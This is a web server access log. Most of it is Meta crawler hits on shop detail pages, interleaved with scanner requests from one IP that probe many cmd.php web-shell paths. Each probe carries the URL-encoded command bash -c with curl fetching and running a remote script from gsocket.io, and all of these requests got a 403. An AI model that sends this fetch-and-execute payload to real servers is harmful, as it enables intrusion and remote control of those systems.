157.230.44.159 - - [08/Jun/2025:09:33:48 -0600] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
157.230.44.159 - - [08/Jun/2025:09:33:57 -0600] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.23 - - [08/Jun/2025:09:34:15 -0600] "GET /shopdetail/1190477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:34:19 -0600] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.1 - - [08/Jun/2025:09:34:28 -0600] "GET /shopdetail/1154477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:34:30 -0600] "GET /shopdetail/1293977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [08/Jun/2025:09:34:35 -0600] "GET /shopdetail/1288577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:34:37 -0600] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.15 - - [08/Jun/2025:09:34:42 -0600] "GET /shopdetail/1480277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:34:50 -0600] "GET /shopdetail/967277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:35:02 -0600] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.29 - - [08/Jun/2025:09:35:14 -0600] "GET /shopdetail/998777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:35:21 -0600] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.11 - - [08/Jun/2025:09:35:27 -0600] "GET /shopdetail/1104077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [08/Jun/2025:09:35:36 -0600] "GET /shopdetail/1114877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:35:44 -0600] "GET /shopdetail/1713377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.4 - - [08/Jun/2025:09:35:55 -0600] "GET /shopdetail/1112177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:09:36:00 -0600] "GET /shopdetail/991577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:36:09 -0600] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.21 - - [08/Jun/2025:09:36:10 -0600] "GET /shopdetail/972677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:09:36:19 -0600] "GET /shopdetail/1266977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:36:28 -0600] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.17 - - [08/Jun/2025:09:36:42 -0600] "GET /shopdetail/1669277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:36:42 -0600] "GET /shopdetail/1187777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:36:45 -0600] "GET /shopdetail/1662077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:36:57 -0600] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.27 - - [08/Jun/2025:09:37:10 -0600] "GET /shopdetail/1583777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:37:22 -0600] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.24 - - [08/Jun/2025:09:37:25 -0600] "GET /shopdetail/1017677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:37:37 -0600] "GET /shopdetail/1234577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:37:39 -0600] "GET /shopdetail/1505477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [08/Jun/2025:09:37:40 -0600] "GET /shopdetail/1606277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:37:48 -0600] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.14 - - [08/Jun/2025:09:37:52 -0600] "GET /shopdetail/1588277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.23 - - [08/Jun/2025:09:38:02 -0600] "GET /shopdetail/1734077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:38:03 -0600] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.8 - - [08/Jun/2025:09:38:09 -0600] "GET /shopdetail/1239077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:38:23 -0600] "GET /shopdetail/1511777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:38:37 -0600] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.4 - - [08/Jun/2025:09:38:41 -0600] "GET /shopdetail/1265177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.1 - - [08/Jun/2025:09:38:48 -0600] "GET /shopdetail/1102277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:38:49 -0600] "GET /shopdetail/1248977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:38:54 -0600] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.4 - - [08/Jun/2025:09:38:56 -0600] "GET /shopdetail/1274177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [08/Jun/2025:09:39:08 -0600] "GET /shopdetail/1410077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.26 - - [08/Jun/2025:09:39:21 -0600] "GET /shopdetail/1624277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:39:23 -0600] "GET /shopdetail/1579277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:39:30 -0600] "GET /shopdetail/1431677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:39:33 -0600] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.12 - - [08/Jun/2025:09:39:35 -0600] "GET /shopdetail/1403777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:39:42 -0600] "GET /shopdetail/964577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:39:48 -0600] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.28 - - [08/Jun/2025:09:39:54 -0600] "GET /shopdetail/1437977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [08/Jun/2025:09:39:59 -0600] "GET /shopdetail/1169777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.30 - - [08/Jun/2025:09:40:05 -0600] "GET /shopdetail/1068077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:40:07 -0600] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.14 - - [08/Jun/2025:09:40:08 -0600] "GET /shopdetail/1026677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.7 - - [08/Jun/2025:09:40:19 -0600] "GET /shopdetail/1575677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:09:40:22 -0600] "GET /shopdetail/1302977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:40:22 -0600] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.8 - - [08/Jun/2025:09:40:46 -0600] "GET /shopdetail/1541477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:40:59 -0600] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.22 - - [08/Jun/2025:09:41:05 -0600] "GET /shopdetail/1707077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.2 - - [08/Jun/2025:09:41:11 -0600] "GET /shopdetail/1536977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:41:34 -0600] "GET /shopdetail/1623377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:41:42 -0600] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.27 - - [08/Jun/2025:09:41:43 -0600] "GET /shopdetail/1384877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:09:41:46 -0600] "GET /shopdetail/1002377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [08/Jun/2025:09:41:56 -0600] "GET /shopdetail/1377677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:41:57 -0600] "GET /shopdetail/1087877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:42:11 -0600] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.4 - - [08/Jun/2025:09:42:15 -0600] "GET /shopdetail/1580177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.17 - - [08/Jun/2025:09:42:21 -0600] "GET /shopdetail/1161677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:09:42:24 -0600] "GET /shopdetail/1363277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:42:27 -0600] "GET /shopdetail/1382177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:42:37 -0600] "GET /shopdetail/1729577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:42:40 -0600] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.28 - - [08/Jun/2025:09:42:52 -0600] "GET /shopdetail/997877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:43:00 -0600] "GET /shopdetail/1096877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.13 - - [08/Jun/2025:09:43:07 -0600] "GET /shopdetail/975377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.3 - - [08/Jun/2025:09:43:10 -0600] "GET /shopdetail/1517177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.20 - - [08/Jun/2025:09:43:26 -0600] "GET /shopdetail/1105877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:43:32 -0600] "GET /shopdetail/1018577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:43:32 -0600] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.10 - - [08/Jun/2025:09:43:38 -0600] "GET /shopdetail/1392077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:44:03 -0600] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.29 - - [08/Jun/2025:09:44:08 -0600] "GET /shopdetail/1354277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:44:23 -0600] "GET /shopdetail/1434377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.24 - - [08/Jun/2025:09:44:24 -0600] "GET /shopdetail/1383077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:44:28 -0600] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.1 - - [08/Jun/2025:09:44:46 -0600] "GET /shopdetail/1226477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:44:48 -0600] "GET /shopdetail/1527977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:44:48 -0600] "GET /shopdetail/1662977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [08/Jun/2025:09:44:49 -0600] "GET /shopdetail/1510877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.19 - - [08/Jun/2025:09:44:52 -0600] "GET /shopdetail/1479377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:44:55 -0600] "GET /shopdetail/1216577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:45:15 -0600] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.22 - - [08/Jun/2025:09:45:31 -0600] "GET /shopdetail/1419077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.12 - - [08/Jun/2025:09:45:39 -0600] "GET /shopdetail/1335377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:45:40 -0600] "GET /shopdetail/1560377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:45:44 -0600] "GET /shopdetail/1712477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:45:54 -0600] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.25 - - [08/Jun/2025:09:45:57 -0600] "GET /shopdetail/1523477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:46:03 -0600] "GET /shopdetail/1744877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.15 - - [08/Jun/2025:09:46:03 -0600] "GET /shopdetail/1649477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:46:09 -0600] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.8 - - [08/Jun/2025:09:46:09 -0600] "GET /shopdetail/1341677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:46:33 -0600] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.16 - - [08/Jun/2025:09:46:35 -0600] "GET /shopdetail/1409177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.21 - - [08/Jun/2025:09:46:47 -0600] "GET /shopdetail/1333577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.2 - - [08/Jun/2025:09:46:48 -0600] "GET /shopdetail/1430777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.27 - - [08/Jun/2025:09:46:49 -0600] "GET /shopdetail/1041977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:46:53 -0600] "GET /shopdetail/1088777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:46:57 -0600] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
157.230.44.159 - - [08/Jun/2025:09:47:19 -0600] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.8 - - [08/Jun/2025:09:47:41 -0600] "GET /shopdetail/1205777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:47:58 -0600] "GET /shopdetail/1567577 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.18 - - [08/Jun/2025:09:48:06 -0600] "GET /shopdetail/1617977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:48:11 -0600] "GET /shopdetail/1139177 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.16 - - [08/Jun/2025:09:48:12 -0600] "GET /shopdetail/1348877 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.14 - - [08/Jun/2025:09:48:32 -0600] "GET /shopdetail/1488377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:48:35 -0600] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.10 - - [08/Jun/2025:09:49:00 -0600] "GET /shopdetail/1520777 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:49:09 -0600] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
157.230.44.159 - - [08/Jun/2025:09:49:37 -0600] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.29 - - [08/Jun/2025:09:49:43 -0600] "GET /shopdetail/1467677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:49:46 -0600] "GET /shopdetail/1605377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:49:53 -0600] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.26 - - [08/Jun/2025:09:50:04 -0600] "GET /shopdetail/1119377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.230.44.159 - - [08/Jun/2025:09:50:23 -0600] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
57.141.2.8 - - [08/Jun/2025:09:50:37 -0600] "GET /shopdetail/1028477 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:50:39 -0600] "GET /shopdetail/969977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.6 - - [08/Jun/2025:09:50:39 -0600] "GET /shopdetail/1593677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.8 - - [08/Jun/2025:09:50:41 -0600] "GET /shopdetail/1359677 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.22 - - [08/Jun/2025:09:50:44 -0600] "GET /shopdetail/1599077 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.28 - - [08/Jun/2025:09:50:45 -0600] "GET /shopdetail/1329977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.25 - - [08/Jun/2025:09:50:47 -0600] "GET /shopdetail/1032977 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.29 - - [08/Jun/2025:09:50:50 -0600] "GET /shopdetail/1290377 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.10 - - [08/Jun/2025:09:51:06 -0600] "GET /shopdetail/1426277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.2.5 - - [08/Jun/2025:09:51:11 -0600] "GET /shopdetail/1219277 HTTP/1.1" 200 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
